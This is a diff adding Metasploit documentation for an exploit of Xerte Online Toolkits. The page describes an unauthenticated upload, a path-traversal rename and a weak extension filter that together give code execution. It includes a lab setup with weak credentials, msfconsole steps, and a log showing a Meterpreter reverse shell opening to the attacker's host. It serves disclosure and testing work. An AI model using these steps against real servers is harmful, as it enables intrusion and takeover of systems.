bootstrapbool
diff --git a/‎documentation/modules/exploit/multi/http/xerte_unauthenticated_mediaupload.md‎
Lines changed: 161 additions & 0 deletions b/‎documentation/modules/exploit/multi/http/xerte_unauthenticated_mediaupload.md‎
Lines changed: 161 additions & 0 deletions
@@ -0,0 +1,161 @@
+## Vulnerable Application
+
+This module exploits authentication failure, extension blacklist, and path
+traversal vulnerabilities in Xerte Online Toolkits versions 3.15 (at commit
+4e40f8030a2e3267267db7ce03e0ff57270be6f5 as they do not use patch versions)
+and earlier.
+
+The vulnerabilities exists in the /editor/elfinder/php/connector.php endpoint
+which which fails to kill execution after redirecting unauthenticated users.
+A file with a php payload can be uploaded and then moved outside of a user's
+directory to the webroot by using the elfinder "rename" functionality. Because
+of an improper use of regex in the file extension filter, the file can be
+renamed to have a .php4 extension, thus allowing remote code execution.
+
+Tested Xerte Online Toolkits versions 3.15, 3.14, and 3.13 on Ubuntu 24.04 and
+3.15 on Windows 10.
+
+## Setup
+
+See installation [instructions](
+https://github.com/thexerteproject/xerteonlinetoolkits/blob/develop/documentation/ToolkitsInstallationGuide.pdf)
+
+### Update
+
+~~~bash
+sudo apt update && sudo apt upgrade
+~~~
+
+### Install XAMPP
+
+Download XAMPP from https://sourceforge.net/projects/xampp/
+
+~~~bash
+sudo ~/Downloads/xampp-linux-x64-8.2.12-0-installer.run
+~~~
+
+### Install Xerte Online Toolkits
+
+~~~
+cd /opt/lampp/htdocs
+sudo git clone https://github.com/thexerteproject/xerteonlinetoolkits
+sudo mv xerteonlinetoolkits xt
+cd xt
+sudo git fetch --all
+sudo git checkout -b master origin/master
+sudo git checkout 4e40f8030a2e3267267db7ce03e0ff57270be6f5
+~~~
+
+### Start Apache and MySQL via Xampp
+
+To start the xampp management console:
+
+~~~bash
+sudo /opt/lampp/manager-linux-x64.run
+~~~
+
+Then ensure Apache and MySQL are running.
+
+### Setup MySQL
+
+~~~bash
+sudo /opt/lampp/bin/mysql
+use mysql
+CREATE USER 'xerteadmin'@'localhost' IDENTIFIED BY 'password123';
+GRANT ALL PRIVILEGES on *.* to 'xerteadmin'@'localhost' IDENTIFIED BY 'password123';
+FLUSH PRIVILEGES;
+exit
+~~~
+
+### Setup Xerte
+
+Navigate to `http://localhost/xt/setup/`
+
+1. Click "Install"
+2. Verify System Requirements are good.
+3. Click "Next"
+4. Run `sudo chmod 777 /opt/lampp/htdocs/xt/{.,setup,USER-FILES,error_logs,import}`
+5. Click "Next" until you get to /setup/page1.php
+6. Verify all Module Checks
+7. Enter the user information you created before "xerteadmin:password123"
+8. Ensure the database user info is same as before, click "Next"
+9. Create Admin Account "admin1:admin123"
+10. On page3.php scroll to bottom and select "Db" authentication in the "Choose an authentication method" dropdown
+11. Hit Save
+
+### Create Normal User
+
+http://localhost/xt/index.php
+
+Sign in as the admin created in previous step "admin1:admin123"
+
+Users > Manage Db auth users
+
+Login name: user1
+First name: fName
+Last name: lName
+Password: user123
+Email: <leave blank>
+
+Hit "Create user" then logout
+
+### Create A Template
+
+Sign into the new user at http://localhost/xt (or whatever the directory you
+created under htdocs is)
+
+On the very right side of the application under "Project Templates" click the
+"Create" button under the "Xerte Online Toolkit" ribbon.
+
+You should be prompted for a name for the new template. Use whatever name and
+click "Create" again. Close out of the Template editor that opens up. You can
+click "Cancel" or "Ok" when prompted to Publish the changes, doesn't matter
+which.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use exploit/multi/http/xerte_unauthenticated_mediaupload`
+3. `set RHOSTS <target>`
+4. `set TARGETURI <uri to xerte>` (e.g., `xerteonlinetoolkits/`)
+5. `set LHOST <your_ip>`
+6. `set username <valid user>`
+7. `exploit`
+
+On success a meterpreter session will be started
+If no WEBROOT argument is provided, one is automatically detected and used
+
+## Options
+
+### WEBROOT
+
+The full filepath to the application root. For example /var/www/html/
+
+If not given, the module will try to detect the webroot from the setup/ endpoint.
+
+## Scenarios
+
+### Exploiting Xerte Online Toolkits to obtain Meterpreter Session
+
+~~~
+msf > use exploit/multi/http/xerte_unauthenticated_mediaupload
+[*] Using configured payload php/meterpreter_reverse_tcp
+msf exploit(multi/http/xerte_unauthenticated_mediaupload) > set rhosts 10.0.0.45
+rhosts => 10.0.0.45
+msf exploit(multi/http/xerte_unauthenticated_mediaupload) > set targeturi xt
+targeturi => xt
+msf exploit(multi/http/xerte_unauthenticated_mediaupload) > set webroot /opt/lampp/htdocs/xt
+webroot => /opt/lampp/htdocs/xt
+msf exploit(multi/http/xerte_unauthenticated_mediaupload) > set username user1
+username => user1
+msf exploit(multi/http/xerte_unauthenticated_mediaupload) > set lhost 10.0.0.218
+lhost => 10.0.0.218
+msf exploit(multi/http/xerte_unauthenticated_mediaupload) > run
+[*] Started reverse TCP handler on 10.0.0.218:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Meterpreter session 1 opened (10.0.0.218:4444 -> 10.0.0.45:40848) at 2026-04-24 10:35:38 -0400
+[!] This exploit may require manual cleanup of '/opt/lampp/htdocs/xt/USER-FILES/1-user1-Nottingham/veYtVoJC' on the target
+[!] This exploit may require manual cleanup of '/opt/lampp/htdocs/xt/USER-FILES/1-user1-Nottingham/veYtVoJC.txt' on the target
+[!] This exploit may require manual cleanup of '/opt/lampp/htdocs/xt/veYtVoJC.php4' on the target
+~~~